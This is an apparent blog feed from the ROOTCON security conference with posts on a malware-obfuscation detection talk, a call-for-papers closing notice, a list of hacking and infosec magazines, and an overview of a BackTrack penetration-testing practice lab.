Synopsis: Recent malwares have been using obfuscation techniques to hide its code from Antivirus software. Making use of emulation is very effective but would probably result in a slow performing machine especially when your valid apps are getting scanned from malwares. Thus, before a full emulation can be done, a static detection can help minimize this slow performance. Detecting the existence of obfuscated text segregates valid applications from malwares. This topic shows different methods on how to determine if a certain text is rather randomized.

Speaker: Reginald Wong
Speaker Background: Reggie has been in the anti-malware industry for almost 10 years doing research on different types of malwares. He currently heads the heuristics team at GFI Software Philippines and aims to detect malwares before they get in to your system.

More at https://www.rootcon.org/xml/rootcon6/tracks

↧

ROOTCON 6 Call For Papers Now Close

May 30, 2012, 4:34 pm

≫ Next: 8 Hacking and Information Security Magazines You Might Wanna Read

≪ Previous: New CFP Submission

ROOTCON 6 Call For Papers is now close, we would like to thanks everyone who submitted. For those who were not accepted you can still enjoy the fun at ROOTCON by registering, socialize, network, learn and have fun.

Pre-final tracks can be found here

Get to know our ub3r4w3s()me speakers here

We will be posting ROOTCON 6 schedule soon.

What are you waiting for? Register now (Early Registration closing on June 30, 2012) and witness the fun and educational event this coming September 7-8, 2012.

Hope to see you all at the CON.

↧

8 Hacking and Information Security Magazines You Might Wanna Read

June 4, 2012, 12:48 am

≫ Next: Checking out BackTrack Linux 5r2-PenTesting Edition Lab!

≪ Previous: ROOTCON 6 Call For Papers Now Close

As a programming student, security researcher and a blogger; I always keep up to date about what is happening in cyber space by reading infosec articles and magazines. Magazines I usually read have niches or themes like Information Security, Cyber Warfare, Cyber Espionage, Penetration Testing and Hacking. And so here are 8 Hacking and Information Security Magazines that I like to share to all of you guys:

1. Hakin9 - Hakin9 Magazine is a payable magazine devoted to IT security and covers techniques of breaking into computer systems, defense and protection methods, tools and latest trends in IT Security. It has 4 different editions every month: Hakin9 – main issue, Hakin9 Extra – every issue is devoted to one topic only, Exploiting Software magazine – Partition Analysis, Stack Overflow and many more, and Mobile Security – hacking and securing of mobile systems and applications.

2. PenTest Magazine - PenTest Magzine is a payable magazine which focuses on Penetration Testing. It features articles by penetration testing specialists, enthusiasts, and experts in vulnerability assessment and management. The PenTest Magazine features 48 issues in a year – 4 issues in a month. Different title is published every week; PenTest Regular, Auditing & Standards PenTest, PenTest Market, and Web App Pentesting. Their team is also behind the Certified PenTest Laboratory Tester (CPLT) Certification.

3. ClubHack Magazine - ClubHack Magazine or CHmag is India's 1st Hacking Magazine and one of the media partners of ROOTCON. Their magazine is free to download and is divided into the following sections: Tech Gyan, Legal Gyan, Tool Gyan, Mom's Guide, Matriux Vibhag, and Code Gyan. I also contributed one article to this magazine which is about Decoding ROT using the Echo and Tr Commands in your Linux Terminal. They are also the organizers of ClubHack Conference.

4. (IN)SECURE Magazine - (IN)SECURE Magazine is a free digital security publication discussing information security topics by Help Net Security which has been a prime resource for information security news since 1998.. They also accept guest authors and has a lot of subscribers.

5. Phrack Magazine - Nothing beats the old school! Nobody messes with the Phrack Magazine which is an online ezine for hackers and by the hackers. Phrack was first released on November 17, 1985 which until now became the largest computer underground ezine. In fact, The Hacker’s Manifesto was also published in this online ezine on the 7th issue. Truly an old yet awesome archive which takes you to the old days of the hacker culture in the 80′s. The current issue is 68 and I thought it will end on issue number 63 but the good thing is it is still alive and kicking.

6. 2600: The Hacker Quarterly - 2600: The Hacker Quarterly is a publication that focuses in publishing information about subjects like phreaking, infosec, hacking, the computer underground, anarchist issues, and many more. 2600 has established the H.O.P.E. (Hackers On Planet Earth) conferences as well as monthly meetings in some countries.

7. Hacker5 - Hacker5 is a monthly magazine from India which provides you with some of the latest happenings in the Cyber world. Their team is composed of journalists and ethical hackers. Some of their magazines are free to download and some are payable. In their website, they also have a dedicated page for the hackers, security professionals and developers that they interviewed.

8. Hacker Monthly - Hacker Monthly is the print magazine edition of Hacker News which is a known social bookmarking news website and popular among programmers, SEO Specialists, Link Builders, developers, geeks and startup founders.Every month they select from the top voted articles that are bookmarked on Hacker News website and print them in magazine format but it is not for free anymore.

About the Contributor:

↧

Checking out BackTrack Linux 5r2-PenTesting Edition Lab!

June 10, 2012, 7:03 am

≫ Next: ROOTCON 6 SpeedTalks

≪ Previous: 8 Hacking and Information Security Magazines You Might Wanna Read

What's a BackTrack Linux 5r2-PenTesting Edition Lab? What's with the edition thingy? Isn't BackTrack 5 a pentesting distro already? Why make a pentesting edition?

Maybe these are some of the questions you have in your mind after reading the title and because of that, I would like to give some few points about this edition.

BackTrack Linux 5r2-PenTesting Edition Lab is still the same BackTrack 5 r2 with the same pentesting tools pre-installed in the distribution and has KDE as its Desktop Environment although in backtrack-linux.org you can also choose if you want Gnome or KDE. The only difference is that it includes all of the hosts, network infrastructure, tools, and targets necessary to practice penetration testing for the CPLT or Certified PenTest Laboratory course which is brought to you by PenTest Laboratory and the guys behind PenTest Magazine.

This edition is a modified version of NETinVM which has a predefined User-mode Linux (UML) based penetration testing targets. When started, this builds an entire network of machines within the VMware virtual machine. The BackTrack Linux distribution is used to provide the tools necessary for completing the lab scenarios. Thus, It is an an all-in-one penetration testing lab environment that pre-configured with:

- A master (base) host utilizing BackTrack Linux 5r2

- A DMZ network with two hosts (targets)

- An “internal” network with one host (target)

- A pre-configured firewall

This pentesting lab is available for free to non-CPLT course students which can be downloaded here.

Here are some of targets you can attack or play with:

- 10.5.0.1

- 10.5.0.254
- 10.5.1.10

- 10.5.1.254

About the Contributor:

↧